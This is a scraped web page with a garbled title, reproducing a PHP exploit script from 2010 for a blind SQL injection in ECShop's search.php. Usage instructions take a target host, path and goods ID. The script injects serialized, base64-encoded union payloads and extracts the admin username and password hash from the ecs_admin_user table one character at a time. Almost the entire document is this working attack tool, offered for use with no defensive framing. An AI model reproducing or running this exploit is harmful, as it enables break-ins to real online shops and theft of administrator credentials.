ECShop ҳSQLעExploit

ECShop ҳSQLעExploit  =>
 # Exploit Title: ECShop Search.php SQL Injection Exploit
 # Date: 2010-05-17
 # Author: Jannock
 # Software Link: http://www.ecshop.com
 # Version: ECShop All Version
 # Tested on:
 # CVE :
 # WAVDB: WAVDB-01606
 # Code :
  
 


view source

print?




001

<?php





002

ini_set("max_execution_time",0);





003

error_reporting(7);





004

 





005

function usage()





006

{





007

global $argv;





008

exit(





009

"\n--+++============================================================+++--".





010

"\n--+++====== ECShop Search.php SQL Injection Exploit========+++--".





011

"\n--+++============================================================+++--".





012

"\n\n[+] Author: jannock".





013

"\n[+] Team: <a href="http://wavdb.com/" target="_blank">http://wavdb.com/</a>".





014

"\n[+] Usage: php ".$argv[0]." <hostname> <path> <goods_id>".





015

"\n[+] Ex.: php ".$argv[0]." localhost / 1".





016

"\n\n");





017

}





018

 





019

function query($pos, $chr, $chs,$goodid)





020

{





021

switch ($chs){





022

 





023

case 0:





024

$query = "1=1";





025

break;





026

case 1:





027

$query = " ascii(substring((select user_name from ecs_admin_user limit





028

0,1),{$pos},1))={$chr}";





029

break;





030

case 2:





031

$query = " ascii(substring((select password from ecs_admin_user limit





032

0,1),{$pos},1))={$chr}";





033

break;





034

case 3:





035

$query = " length((select user_name from ecs_admin_user limit 0,1))={$pos}";





036

break;





037

}





038

$list=array("1' or 1=1) and 1=2 GROUP BY goods_id HAVING num = '1'





039

union select $goodid,1 from ecs_admin_user where 1=1 and ". $query





040

."/*"=>"1");





041

$query = array("attr"=>$list);





042

$query = str_replace('+', '%2b', base64_encode(serialize($query)));





043

return $query;





044

}





045

 





046

function exploit($hostname, $path, $pos, $chr, $chs,$goodid)





047

{





048

$chr = ord($chr);





049

$conn = fsockopen($hostname, 80);





050

 





051

$message = "GET ".$path."/search.php?encode=".query($pos, $chr,





052

$chs,$goodid)." HTTP/1.1\r\n";





053

$message .= "Host: $hostname\r\n";





054

$message .= "Connection: Close\r\n\r\n";





055

 





056

fwrite($conn, $message);





057

while (!feof($conn))





058

{





059

$reply .= fgets($conn, 1024);





060

}





061

fclose($conn);





062

return $reply;





063

}





064

 





065

 





066

function crkusername($hostname, $path, $chs,$goodid)





067

{





068

global $length;





069

$key = "abcdefghijklmnopqrstuvwxyz0123456789";





070

$chr = 0;





071

$pos = 1;





072

echo "[+] username: ";





073

while ($pos <= $length)





074

{





075

$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);





076

 





077

if (preg_match ("/javascript:addToCart/i", $response))





078

{





079

echo $key[$chr];





080

$chr = 0;





081

$pos++;





082

}





083

else





084

$chr++;





085

}





086

echo "\n";





087

}





088

 





089

function crkpassword($hostname, $path, $chs,$goodid)





090

{





091

$key = "abcdef0123456789";





092

$chr = 0;





093

$pos = 1;





094

echo "[+] password: ";





095

while ($pos <= 32)





096

{





097

$response = exploit($hostname, $path, $pos, $key[$chr], $chs,$goodid);





098

if (preg_match ("/javascript:addToCart/i", $response))





099

{





100

echo $key[$chr];





101

$chr = 0;





102

$pos++;





103

}





104

else





105

$chr++;





106

}





107

echo "\n\n";





108

}





109

 





110

function lengthcolumns($hostname, $path,$chs, $goodid)





111

{





112

echo "[+] username length: ";





113

$exit = 0;





114

$length = 0;





115

$pos = 1;





116

$chr = 0;





117

while ($exit==0)





118

{





119

$response = exploit($hostname, $path, $pos, $chr, $chs,$goodid);





120

if (preg_match ("/javascript:addToCart/i", $response))





121

{





122

$exit = 1;





123

$length = $pos;





124

break;





125

}





126

else





127

{





128

$pos++;





129

if($pos>20)





130

{





131

exit("Exploit failed");





132

}





133

}





134

}





135

echo $length."\n";





136

return $length;





137

}





138

 





139

 





140

if ($argc != 4)





141

usage();





142

$hostname = $argv[1];





143

$path = $argv[2];





144

$goodid = $argv[3];





145

$length = lengthcolumns($hostname, $path, 3, $goodid);





146

crkusername($hostname, $path, 1,$goodid);





147

crkpassword($hostname, $path, 2,$goodid);





148

 





149

?>
